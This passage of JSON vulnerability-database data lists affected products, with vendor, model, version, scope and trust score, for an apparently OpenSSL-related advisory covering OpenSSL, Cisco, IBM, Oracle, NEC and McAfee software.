"vendor": "openssl", "version": "1.0.2c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1r" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.2d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1n" }, { "model": "openssl", "scope": "lte", "trust": 0.8, "vendor": "openssl", "version": "1.0.2h" }, { "model": "capssuite", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v3.0 to v4.0" }, { "model": "enterpriseidentitymanager", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "esmpro/serveragentservice", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "(linux edition )" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "sg3600 all series" }, { "model": "ix1000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ix2000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "ix3000 series", "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": "secureware/pki application development kit", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver3.2" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "enterprise v8.2 to v9.4" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "express v8.2 to v9.4" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "foundation v8.2 to v8.5" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard v8.2 to v9.4" }, { "model": "webotx enterprise service bus", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v8.5" }, { "model": "webotx portal", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "v8.2 to v9.1" }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.10" }, { "model": "webex centers t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "sterling connect:express for unix ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13150-13" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8zg", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series blade switches 4.1 e1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4000" }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.9" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "proactive network operations center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69010" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "ucs central software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13" }, { "model": "stealthwatch management console", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for os deployment 5.1.fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "project openssl g", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.2" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.5" }, { "model": "project openssl 0.9.8u", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "jabber software development kit", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "computer telephony integration object server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified workforce optimization", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "industrial router 1.2.1rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "910" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.14" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "asr series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches standalone nx-os mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.3.1" }, { "model": "nexus series switches standalone nx-os mode 7.0 i5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.11" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7000" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.26" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.4" }, { "model": "project openssl 0.9.8zb", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl b-36.8", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.9" }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "stealthwatch flowcollector sflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "web security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.11" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2.2" }, { "model": "jd edwards enterpriseone tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "9.2.1.1" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60002.9" }, { "model": "content security management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration provisioning", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "agent for openflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.4" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.8" }, { "model": "ons series multiservice provisioning platforms", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "154540" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.15" }, { "model": "telepresence sx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa next-generation firewall services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email security appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.0.1" }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8200" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.9" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "unified communications manager im \u0026 presence service (formerly c", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.3" }, { "model": "project openssl 1.0.0m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "webex meetings for blackberry", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.5" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.0.1.3" }, { "model": "anyconnect secure mobility client for mac os", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x4.0.7" }, { "model": "common services platform collector", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.11" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "partner support service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "media services interface", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.9" }, { "model": "cloud web security", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration assurance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "jabber for iphone and ipad", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0" }, { "model": "email gateway 7.6.2h968406", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mx series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "spectrum control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.8" }, { "model": "webex meetings client on-premises", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "unified intelligence center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6(1)" }, { "model": "services provisioning platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs b-series blade servers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.1.3" }, { "model": "nac appliance clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "project openssl g", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10000" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "jabber for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa next-generation firewall services", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.2" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.405" }, { "model": "unified attendant console premium edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "api gateway", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.2.4.0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5" }, { "model": "services provisioning platform sfp1.1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.8" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.5" }, { "model": "video surveillance series high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "jabber for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "anyconnect secure mobility client for desktop platforms", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.3.4" }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "series digital media players 5.3.6 rb3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30002.9" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.20" }, { "model": "mysql workbench", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3.8" }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "stealthwatch identity", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.2" }, { "model": "project openssl beta4", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "application policy infrastructure controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.2(1)" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "general parallel file system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.0" }, { "model": "project openssl beta5", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.1" }, { "model": "unified workforce optimization quality management solution 11.5 su1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence system ex series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "universal small cell iuh", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.2" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.5" }, { "model": "project openssl 1.0.0s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli provisioning manager for images build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "jabber client framework components", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "webex meetings client on-premises t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "dcm series d9900 digital content manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70006.2.19" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "unified attendant console business edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.4" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.54" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.4" }, { "model": "mds series multilayer switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "prime network services controller 1.01u", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "oss support tools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.9.15.9.8" }, { "model": "firesight system software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.0.10" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50000" }, { "model": "nexus series switches 5.2 sv3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1000v" }, { "model": "telepresence system tx1310", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications domain manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media and", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3103204.4" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.08" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.10" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "api connect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "anyconnect secure mobility client for linux", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.1" }, { "model": "telepresence system ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex business suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dx series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "communications network charging and control", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.1.0" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.5(3)" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.18" }, { "model": "project openssl 0.9.8za", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "anyconnect secure mobility client for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 0.9.8m beta1", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series blade switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "40000" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.11" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "500-376.1" }, { "model": "jabber for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "telepresence profile series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.1.0.0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.10" }, { "model": "ace30 application control engine module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.0.28" }, { "model": "edge digital media player 1.6rb5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "300" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.12" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69450" }, { "model": "telepresence isdn gateway mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "wireless lan controller", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.4" }, { "model": "jabber software development kit", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "uc integration for microsoft lync", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.3" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "unified contact center enterprise", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.1" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.404" }, { "model": "telepresence system tx1310", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "spa112 2-port phone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.151.05" }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.3" }, { "model": "transportation management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.5" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.33" }, { "model": "telepresence mx series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.6" }, { "model": "ip interoperability and collaboration system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.0(1)" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.7" }, { "model": "spa122 analog telephone adapter with router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50003.5.12.23" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "50003.4.2.0" }, { "model": "connected grid routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "uc integration for microsoft lync", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.1" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.401" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.8" }, { "model": "unity express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.7" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.21" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "tandberg codian isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway 7.6.405h1165239", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "jabber guest", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.9" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.9.0" }, { "model": "digital media manager 5.3.6 rb3", "scope": "ne", "trust": 0.3, 